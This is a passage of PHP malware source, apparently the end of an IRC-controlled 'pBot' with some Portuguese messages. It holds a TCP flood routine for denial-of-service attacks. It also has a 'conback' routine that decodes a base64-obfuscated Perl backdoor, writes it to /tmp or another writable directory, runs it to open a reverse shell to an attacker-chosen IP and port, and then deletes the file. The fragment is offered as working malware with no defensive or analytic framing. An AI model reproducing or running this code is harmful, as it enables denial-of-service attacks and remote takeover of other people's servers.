for($i=0;$i<$packetsize;$i++)
$packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{

if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
{
$this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.");
}
function conback($ip,$port)
{
$this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
$dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgI kRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI 7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6I CQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQp wcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc 3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1Z bMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50I CJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHB yb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvd G9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09 DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVyc m9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3Q pOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4I iwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmx lIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3b mluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGV uKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiP iZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik 7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIge CA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2h lZFxuXG4iOw==";
if (is_writable("/tmp"))
{
if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
$fp=fopen("/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /tmp/dc.pl $ip $port &");
unlink("/tmp/dc.pl");
}
else
{
if (is_writable("/var/tmp"))
{
if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); }
$fp=fopen("/var/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /var/tmp/dc.pl $ip $port &");
unlink("/var/tmp/dc.pl");
}
if (is_writable("."))
{
if (file_exists("dc.pl")) { unlink("dc.pl"); }
$fp=fopen("dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl dc.pl $ip $port &");
unlink("dc.pl");
}
}
}
}

$bot = new pBot;
$bot->start();

?>